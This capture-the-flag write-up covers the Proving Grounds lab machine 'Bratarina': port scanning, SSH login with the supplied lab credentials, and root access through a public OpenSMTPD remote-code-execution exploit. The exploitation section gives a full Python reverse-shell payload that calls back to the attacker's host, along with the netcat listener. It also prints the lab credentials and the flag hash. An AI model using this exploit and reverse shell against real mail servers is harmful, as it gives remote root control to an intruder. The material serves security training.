Summary #
Using the provided OFFSEC credentials initial access is possible through SSH. Another path is exploiting the OpenSTMPD service running on port 25, which is vulnerable to a remote code execution exploit which gives access to the root user.
Specifications #
- Name: BRATARINA
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Easy
- OS: Linux bratarina 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.159.71
- OFFSEC provided credentials:
neil:TalonTribunalFrown090 - HASH:
local.txt: None - HASH:
proof.txt:d1a3e21c27ac4c1a7a7ebbd6ced4f708
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir bratarina && cd bratarina && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Jul 21 15:50 .
drwxrwxr-x 12 kali kali 4096 Jul 21 15:50 ..
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 enum
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 exploits
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 files
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 tools
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 uploads
## set bash variable
ip=192.168.159.71
## ping target to check if it's online
ping $ip
PING 192.168.159.71 (192.168.159.71) 56(84) bytes of data.
64 bytes from 192.168.159.71: icmp_seq=1 ttl=61 time=23.9 ms
64 bytes from 192.168.159.71: icmp_seq=2 ttl=61 time=25.5 ms
^C
--- 192.168.159.71 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 23.894/24.681/25.469/0.787 ms
Reconnaissance #
Portscanning #
Using the Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.159.71:22
Open 192.168.159.71:25
Open 192.168.159.71:80
Open 192.168.159.71:445
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 15:54 CEST
Initiating Ping Scan at 15:54
Scanning 192.168.159.71 [4 ports]
Completed Ping Scan at 15:54, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:54
Completed Parallel DNS resolution of 1 host. at 15:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:54
Scanning 192.168.159.71 [4 ports]
Discovered open port 445/tcp on 192.168.159.71
Discovered open port 25/tcp on 192.168.159.71
Discovered open port 22/tcp on 192.168.159.71
Discovered open port 80/tcp on 192.168.159.71
Completed SYN Stealth Scan at 15:54, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.159.71
Host is up, received echo-reply ttl 61 (0.021s latency).
Scanned at 2025-07-21 15:54:41 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
25/tcp open smtp syn-ack ttl 61
80/tcp open http syn-ack ttl 61
445/tcp open microsoft-ds syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 8 (328B) | Rcvd: 5 (204B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
25/tcp open smtp syn-ack ttl 61
80/tcp open http syn-ack ttl 61
445/tcp open microsoft-ds syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## change directory
cd files
## get a list, comma separated of the open port(s)
cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports
## output previous command
22,25,80,445
## move one up
cd ..
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,25,80,445 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: bratarina
| NetBIOS computer name: BRATARINA\x00
| Domain name: \x00
| FQDN: bratarina
|_ System time: 2025-07-21T09:56:16-04:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 17784/tcp): CLEAN (Timeout)
| Check 2 (port 15623/tcp): CLEAN (Timeout)
| Check 3 (port 33461/udp): CLEAN (Timeout)
| Check 4 (port 34791/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-07-21T13:56:13
|_ start_date: N/A
Initial Access #
Initial Access: path 1 #
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
Because we got credentials from OFFSEC we first try to login using SSH on TCP port 22.
## login to target using SSH and provided credentials
ssh neil@$ip
neil@bratarina:~$
Indeed we can login for initial access over SSH.
Initial Access: path 2 #
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES,
On port 25 there is a OpenSMTPD service running. Using searchsploit we can try to find an available exploit. We can try to get remote code execution using linux/remote/47984.py.
## change directory
cd exploits
## use searchsploit to find exploit
searchsploit opensmtpd
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
searchsploit -m linux/remote/47984.py
Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47984
Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
Codes: CVE-2020-7247
Verified: True
File Type: Python script, ASCII text executable
Once downloaded we can run the exploit and get root on the box. The command we send is a python reverse shell, so first we need to setup a listener.
## setup listener
nc -lvnp 80
## run the exploit
python3 47984.py 192.168.159.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.195\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
## catch reverse shell
nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.159.71] 44560
## run the `whoami` command
root@bratarina:~# whoami
root
## print `proof.txt`
root@bratarina:~# cat /root/proof.txt
cat /root/proof.txt
d1a3e21c27ac4c1a7a7ebbd6ced4f708
References #
[+]